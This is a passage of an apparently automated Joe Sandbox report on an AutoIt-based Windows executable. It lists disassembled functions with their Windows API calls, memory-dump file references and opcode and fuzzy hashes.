Opcode Fuzzy Hash: 50afc9489ce8a381209b88e00aa0984612fc472f6bc8b754589088046d6a6d02
Instruction Fuzzy Hash: 6E518171E00219AFCF51DFA8C841AEEB7F6EF48710F108499E915BB351DB34AE418B94

Function 006E936F Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 006E9409
WSAGetLastError.WS2_32(00000000), ref: 006E9416
__WSAFDIsSet.WS2_32(00000000,00000001), ref: 006E943A
_strlen.LIBCMT ref: 006E9484
_memmove.LIBCMT ref: 006E94CA
WSAGetLastError.WS2_32(00000000), ref: 006E94F7

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ErrorLast$_memmove_strlenselect
String ID:
API String ID: 2795762555-0
Opcode ID: e221a17ff7385e83914fc433d8c45b85416c60d4e64cafa08483892f5f8bdd0a
Instruction ID: f9bea59d301222b6abe5e8f73358a280bff06a2e49a839ecc7c1c6de70054cf2
Opcode Fuzzy Hash: e221a17ff7385e83914fc433d8c45b85416c60d4e64cafa08483892f5f8bdd0a
Instruction Fuzzy Hash: 9E418071600208AFCB54EBA9CC85EEEB7BEEF48310F108159F516972D1DB34AE41CB64

Function 006D54E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006D552E
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006D5579
IsMenu.USER32(00000000), ref: 006D5599
CreatePopupMenu.USER32 ref: 006D55CD
GetMenuItemCount.USER32(000000FF), ref: 006D562B
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 006D565C

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 7fef8ae604438874bbe55175a7412ed868b81f477827996eb37bff8b3554fc9f
Instruction ID: 1f73e132c31036e18b51d1ef2778ed8d03ccc8c8484808e3e221ce83a6713ff6
Opcode Fuzzy Hash: 7fef8ae604438874bbe55175a7412ed868b81f477827996eb37bff8b3554fc9f
Instruction Fuzzy Hash: C551CC70E00A89EFDF21CF68D888BEDBBF6AF05318F50811AE4069A7A1D370D944CB51

Function 006AB18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 006AAF7D: GetWindowLongW.USER32(?,000000EB), ref: 006AAF8E

BeginPaint.USER32(?,?,?,?,?,?), ref: 006AB1C1
GetWindowRect.USER32(?,?), ref: 006AB225
ScreenToClient.USER32(?,?), ref: 006AB242
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 006AB253
EndPaint.USER32(?,?), ref: 006AB29D

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 133b744a1297a61e7608fd2bfaf213c4df5381bbf479f25d7246cda5c0b4059d
Instruction ID: 5dd129b2d20127a46fb618753ceaa938452963e7d50d28124a223b53088da968
Opcode Fuzzy Hash: 133b744a1297a61e7608fd2bfaf213c4df5381bbf479f25d7246cda5c0b4059d
Instruction Fuzzy Hash: 5841BD70100300AFC720EF28DC84BBA7BE9EB4A361F144629F9A5862A2C775AD45DF65

Function 006FE1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00751810,00000000,?,?,00751810,00751810,?,0070E2D6), ref: 006FE21B
EnableWindow.USER32(?,00000000), ref: 006FE23F
ShowWindow.USER32(00751810,00000000,?,?,00751810,00751810,?,0070E2D6), ref: 006FE29F
ShowWindow.USER32(?,00000004,?,?,00751810,00751810,?,0070E2D6), ref: 006FE2B1
EnableWindow.USER32(?,00000001), ref: 006FE2D5
SendMessageW.USER32(?,0000130C,?,00000000), ref: 006FE2F8

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: ee4d5fedabcd79c6bdee24a90175a6d6fc3e3e75411d3f679aa09e2cb4e19d92
Instruction ID: 915797e5c6de41482cca45b56320c496915eb47654e935958a918bc718c2621d
Opcode Fuzzy Hash: ee4d5fedabcd79c6bdee24a90175a6d6fc3e3e75411d3f679aa09e2cb4e19d92
Instruction Fuzzy Hash: 5E415D34601148EFDB26CF18C499BE47FA6BF06304F1881B9EB588F2B2D732A941CB51

Function 006FE9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 006AB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 006AB5EB
Part of subcall function 006AB58B: SelectObject.GDI32(?,00000000), ref: 006AB5FA
Part of subcall function 006AB58B: BeginPath.GDI32(?), ref: 006AB611
Part of subcall function 006AB58B: SelectObject.GDI32(?,00000000), ref: 006AB63B

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 006FE9F2
LineTo.GDI32(00000000,00000003,?), ref: 006FEA06
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 006FEA14
LineTo.GDI32(00000000,00000000,?), ref: 006FEA24
EndPath.GDI32(00000000), ref: 006FEA34
StrokePath.GDI32(00000000), ref: 006FEA44

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 3f0f04a9c09805b089107ebcc586ba309759cba0854fd59ab840d1a0f60a651a
Instruction ID: 6cc1480b3a7143ef5036087209e536cc50333028988a08fef364dadd3a20e554
Opcode Fuzzy Hash: 3f0f04a9c09805b089107ebcc586ba309759cba0854fd59ab840d1a0f60a651a
Instruction Fuzzy Hash: E711F77600014DBFDB129F94DC88EEA7FADEB08365F04C012FA09591A0D7769D55DFA4

Function 006CEF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 006CEFB6
GetDeviceCaps.GDI32(00000000,00000058), ref: 006CEFC7
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006CEFCE
ReleaseDC.USER32(00000000,00000000), ref: 006CEFD6
MulDiv.KERNEL32(000009EC,?,00000000), ref: 006CEFED
MulDiv.KERNEL32(000009EC,?,?), ref: 006CEFFF

Part of subcall function 006CA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,006CA79D,00000000,00000000,?,006CAB73), ref: 006CB2CA

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: 272dd45611962db5383eb9b0872956805444b3d8f17ec3a97353651ccc9075a0
Instruction ID: fab399eee678ed3bc01d49bfb9702928ca7fa296132d2d97d19c7d6d1fdfacb9
Opcode Fuzzy Hash: 272dd45611962db5383eb9b0872956805444b3d8f17ec3a97353651ccc9075a0
Instruction Fuzzy Hash: F2018475A40319BFEB109BA59C45F9EBFB9EB48751F00806AFA04AB380D6759C00CF61

Function 006DA3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: 0ee5eb3e627bea6db3e854bd6a5b24b4c6ef169cdd31c5a2c03154ecef8f1aea
Instruction ID: 956bed1cbcdd81afaf240a5b04620fd8f226ee3ba67d2fd60c402c184a02dba0
Opcode Fuzzy Hash: 0ee5eb3e627bea6db3e854bd6a5b24b4c6ef169cdd31c5a2c03154ecef8f1aea
Instruction Fuzzy Hash: 6A016232945211EBD7252B98ED48DEB7777BF49701701852AF503D22A1CBB8AC00CE55

Function 00691867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00691898
MapVirtualKeyW.USER32(00000010,00000000), ref: 006918A0
MapVirtualKeyW.USER32(000000A0,00000000), ref: 006918AB
MapVirtualKeyW.USER32(000000A1,00000000), ref: 006918B6
MapVirtualKeyW.USER32(00000011,00000000), ref: 006918BE
MapVirtualKeyW.USER32(00000012,00000000), ref: 006918C6

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 5f873b3149ba1d2c8f13df31460baeb6a69e2d03eb44f6682d202d45a435ef30
Instruction ID: 44a4d1b9f27a21e445a18a826895bee7df3c34772dc6ef2f002601a238cd1fcd
Opcode Fuzzy Hash: 5f873b3149ba1d2c8f13df31460baeb6a69e2d03eb44f6682d202d45a435ef30
Instruction Fuzzy Hash: 530148B0901B597DE3008F6A8C85A52FEA8FF15354F04411B915C47941C7B5A864CBE5

Function 006D84F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006D8504
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006D851A
GetWindowThreadProcessId.USER32(?,?), ref: 006D8529
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006D8538
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006D8542
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006D8549

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: cc88e12a57f1f9d64baa6d9e654231d28ff9db62dd4ad7bd7afc7151823eb2d6
Instruction ID: a7ff311d0de32f81689e6f9e6661b6aad11e2197d14ffbb9d1a081705713e8e8
Opcode Fuzzy Hash: cc88e12a57f1f9d64baa6d9e654231d28ff9db62dd4ad7bd7afc7151823eb2d6
Instruction Fuzzy Hash: 09F09032240158BBE730175A9C0EEEF3B7CDFC6B51F008018FA0591090D7A86E01DAB8

Function 006DA31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 006DA330
RtlEnterCriticalSection.NTDLL(?), ref: 006DA341
TerminateThread.KERNEL32(?,000001F6,?,?,?,007066D3,?,?,?,?,?,0069E681), ref: 006DA34E
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,007066D3,?,?,?,?,?,0069E681), ref: 006DA35B

Part of subcall function 006D9CCE: CloseHandle.KERNEL32(?,?,006DA368,?,?,?,007066D3,?,?,?,?,?,0069E681), ref: 006D9CD8

InterlockedExchange.KERNEL32(?,000001F6), ref: 006DA36E
RtlLeaveCriticalSection.NTDLL(?), ref: 006DA375

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: a49e6c67a93f0c48b7e4acace18764e99ab7a163035ef2c1e6b58e07522c896f
Instruction ID: 5f8628407a608fae95fc8d98707d374df78fc7b0f212c2292e26fc9d33dfcd04
Opcode Fuzzy Hash: a49e6c67a93f0c48b7e4acace18764e99ab7a163035ef2c1e6b58e07522c896f
Instruction Fuzzy Hash: 2FF05E32945211EBD3212BA8ED4CDDB7B7AFF89302B018522F202921E1CBB99C41DF65

Function 0069C320 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 259fileCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0069C419
ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,006D6653,?,?,00000000), ref: 0069C495

Strings

Sfm, xrefs: 007048B8, 0070487C, 00704839

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: FileRead_memmove
String ID: Sfm
API String ID: 1325644223-2434766911
Opcode ID: 93db5f39ed86c1e1aea7d9ab567f47f42c220a9032bfcfcc664e8c6f85e94dfa
Instruction ID: 7f74e73657dffa18279ea54ec77340a589121c59d50fe3561e7b7155b6689f0e
Opcode Fuzzy Hash: 93db5f39ed86c1e1aea7d9ab567f47f42c220a9032bfcfcc664e8c6f85e94dfa
Instruction Fuzzy Hash: D9A1DC70A04609EBDF00CF69C880BA9FBFAFF05710F14C699E8259B681D735E961DB91

Function 006AD7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 006B010A: std::exception::exception.LIBCMT ref: 006B013E
Part of subcall function 006B010A: __CxxThrowException@8.LIBCMT ref: 006B0153

Part of subcall function 0069CAEE: _memmove.LIBCMT ref: 0069CB2F

Part of subcall function 0069BBD9: _memmove.LIBCMT ref: 0069BC33

__swprintf.LIBCMT ref: 006AD98F

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 006AD832

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: e7fcf5ab17bbdeb293b742eb683d92ba55af38a9c68fe5a7da195bad9264e79d
Instruction ID: 395b80972afec97446445baad2dbba9600e4e1f2af1eb98295f1ea6cb358d8ad
Opcode Fuzzy Hash: e7fcf5ab17bbdeb293b742eb683d92ba55af38a9c68fe5a7da195bad9264e79d
Instruction Fuzzy Hash: A2916871108301DFCB64FF64C885DAABBEABF86700F00091DF496976A1EA24ED45CB56

Function 006EB482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006EB4A8
CharUpperBuffW.USER32(?,?), ref: 006EB5B7
VariantClear.OLEAUT32(?), ref: 006EB73A

Part of subcall function 006DA6F6: VariantInit.OLEAUT32(00000000), ref: 006DA736
Part of subcall function 006DA6F6: VariantCopy.OLEAUT32(?,?), ref: 006DA73F
Part of subcall function 006DA6F6: VariantClear.OLEAUT32(?), ref: 006DA74B

Strings

AUTOIT.ERROR, xrefs: 006EB5BD
Incorrect Parameter format, xrefs: 006EB4E0, 006EB6AD

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 2c86d8547675a2ec30008c64f497526011ae4d4c54332da940ce927f0076ace8
Instruction ID: 0d442ec14d9a6f6ef06b7296c10e1cf710e87f9856cfdaea160e9ad07f19dbab
Opcode Fuzzy Hash: 2c86d8547675a2ec30008c64f497526011ae4d4c54332da940ce927f0076ace8
Instruction Fuzzy Hash: B3916C746083419FCB50DF29C48495BB7FAEF89710F14886EF88A9B391DB31E945CB52

Function 006D5D65 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00693BCF: _wcscpy.LIBCMT ref: 00693BF2

_memset.LIBCMT ref: 006D5E56
GetMenuItemInfoW.USER32(?), ref: 006D5E85
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006D5F31
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 006D5F5B

Strings

0, xrefs: 006D5E4E

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 028fb58fb43f5199ce850098efec9cc7b2a7b40261fc34940299d147a81b54f3
Instruction ID: accc17dfec5cf271835b7791a27f39ff1092b77dd9011a891a5a48272cc07323
Opcode Fuzzy Hash: 028fb58fb43f5199ce850098efec9cc7b2a7b40261fc34940299d147a81b54f3
Instruction Fuzzy Hash: FE51F4719147019AD754AB28C844BEBB7AAEF45310F08492FF893D77D0DB70CD458B96

Function 006D1050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 006D10B8
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006D10EE
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006D10FF
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 006D1181

Strings

DllGetClassObject, xrefs: 006D10F4

Memory Dump Source

